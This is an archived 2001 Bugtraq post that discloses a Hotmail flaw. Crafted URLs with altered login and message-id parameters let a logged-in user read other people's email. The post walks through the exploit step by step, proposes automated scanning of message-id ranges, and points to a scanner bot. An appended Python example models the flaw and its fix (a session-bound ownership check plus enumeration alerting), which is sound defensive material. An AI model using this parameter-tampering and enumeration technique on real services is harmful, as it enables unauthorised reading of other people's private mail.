Bugtraq mailing list archives

Hotmail message view exploit


From: [Digital-Vortex]@securityfocus.com <root () root-core com>
Date: Sat, 18 Aug 2001 14:31:17 -0700 (PDT)

exploit lets you view e-mails from other people's accounts


---=[ Three Steps To View Someone's Emails In Hotmail ]=---

(Tested with Internet Explorer 5)

To view full email from someone else's account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view a specific message from a specific user:

   
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
   or
   
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

   From that link change values:
   MSG943322803%2e16 (Message id number, it's simply a counter. %2e=.)
   username          (Hotmail account name to view)

   (remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
   (remove "&hm___fl=attrd&domain=hotmail.com" if you don't like the hotmail frame on top.)
 
3. Done. If you entered correct message number & that user has it you will see it. :)
   (Test it with your own other hotmail account messages first to get the idea working.)


---=[ ideas and comments for improved viewing / scan ]---

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan a given range of messages from a specific user name.
(You need to build it to work with IE, as you must be
 logged in to hotmail when you want to view messages..)

It also helps to know that from the message numbers
in your own hotmail inbox, you can see about what time
each message number was used. eg:

MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0  arrived on 04.12.2000.

So you don't need to scan as many message addresses
when you know which range you are looking at.

(Check out Hotmail Scanner Bot aka. hobo for automatic scanning.)

Test messages: (Login to hotmail, then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26raw%3d0%26login%3djokutesti99%26domain%3dhotmail%2ecom

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26login%3djokutesti99%26domain%3dhotmail%2ecom

---=[............ Research by wAwAsAn4 ..............]=---
---=[........... wAwAsAn4 () root-core com .............]=---
---=[................. 17.08.2001 ...................]=---


www.root-core.com

==
[Digital-Vortex]
Webmaster
www.root-core.com

_____________________________________________________________
[Root-Core] - [www.root-core.com] - Free E-mail
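
Added example, not part of the original post and not Hotmail's code: a minimal model of the access-control flaw the post describes (the mailbox is selected by a caller-supplied login parameter) beside a handler that binds the mailbox to the authenticated session and records refused requests for alerting. STORE, Session, the function names and the example.test accounts are constructed for illustration.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs, unquote

# Constructed sample data: {(login, domain): {message id: body}}
STORE = {
    ("alice", "example.test"): {"MSG1000000001.1": "alice's mail"},
    ("bob", "example.test"): {"MSG1000000002.1": "bob's mail"},
}

class Forbidden(Exception):
    """Raised when a request names a mailbox the session does not own."""

@dataclass
class Session:
    login: str   # set by the server at authentication time
    domain: str
    denied: list = field(default_factory=list)  # refused message ids, for alerting

def parse_hm_qs(raw):
    """Decode the percent-encoded inner query string carried in hm___qs."""
    return {k: v[0] for k, v in parse_qs(unquote(raw)).items()}

def getmsg_unchecked(params):
    # Flawed pattern: the mailbox is selected by the caller-supplied login.
    return STORE[(params["login"], params["domain"])][params["msg"]]

def getmsg_checked(session, params):
    # The mailbox comes from the session; a login parameter is only compared.
    owner = (session.login, session.domain)
    asked = (params.get("login", owner[0]), params.get("domain", owner[1]))
    if asked != owner:
        session.denied.append(params.get("msg"))
        raise Forbidden("mailbox does not belong to the authenticated session")
    try:
        return STORE[owner][params["msg"]]
    except KeyError:
        # Same answer for "missing" and "not yours": no existence oracle.
        raise Forbidden("message not available") from None

def looks_like_enumeration(session, threshold=3):
    # Repeated cross-account requests from one session are worth an alert.
    return len(session.denied) >= threshold
```

Message ids that track arrival time, as the post observes, make ranges easy to narrow; random ids reduce guessing but do not replace the ownership check.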

